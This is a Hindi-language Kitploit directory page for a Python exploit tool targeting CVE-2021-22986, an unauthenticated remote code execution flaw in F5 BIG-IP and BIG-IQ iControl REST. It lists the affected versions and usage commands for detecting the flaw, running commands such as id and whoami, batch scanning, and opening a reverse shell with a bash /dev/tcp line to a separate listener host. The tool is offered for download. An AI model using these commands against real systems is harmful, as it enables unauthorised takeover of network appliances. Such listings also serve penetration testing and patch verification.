Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22986 — CVE-2021-22986 के लिए Python शोषण, iControl REST के माध्यम से F5 BIG-IP और BIG-IQ पर अनधिकृत RCE सक्षम करना, कमांड निष्पादन, बैच स्कैनिंग और रिवर्स शेल सुविधाओं के साथ। | Kitploit
उपकरण/GitHubGitHub/amitlttwo/cve-2021-22986
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubamitlttwo/cve-2021-22986

CVE-2021-22986

CVE-2021-22986 के लिए Python शोषण, iControl REST के माध्यम से F5 BIG-IP और BIG-IQ पर अनधिकृत RCE सक्षम करना, कमांड निष्पादन, बैच स्कैनिंग और रिवर्स शेल सुविधाओं के साथ।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22986

यह भेद्यता बिना प्रमाणीकरण वाले हमलावरों को, जिनके पास BIG-IP प्रबंधन इंटरफ़ेस और सेल्फ IP पतों के माध्यम से iControl REST इंटरफ़ेस तक नेटवर्क पहुंच है, मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने और सेवाओं को अक्षम करने की अनुमति देती है। इस भेद्यता का शोषण केवल कंट्रोल प्लेन के माध्यम से किया जा सकता है, डेटा प्लेन के माध्यम से नहीं। शोषण के परिणामस्वरूप सिस्टम से पूर्ण समझौता हो सकता है। एप्लायंस मोड में BIG-IP सिस्टम भी असुरक्षित है।

प्रभावित उत्पाद

F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1

उपयोग

root@kitploit:~
python3 CVE_2021_22986.py

भेद्यता का पता लगाना

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

कमांड निष्पादन

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

whoami के साथ कमांड निष्पादित करना

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

बैच स्कैन

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

रिवर्स शेल

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

नया PoC

root@kitploit:~
python3 newpoc.py https://192.168.174.164

संदर्भ:-

  • https://support.f5.com/csp/article/K03009991

  • https://github.com/safesword/F5_RCE

  • https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

  • https://github.com/Udyz/CVE-2021-22986-SSRF2RCE

टूल डाउनलोड करें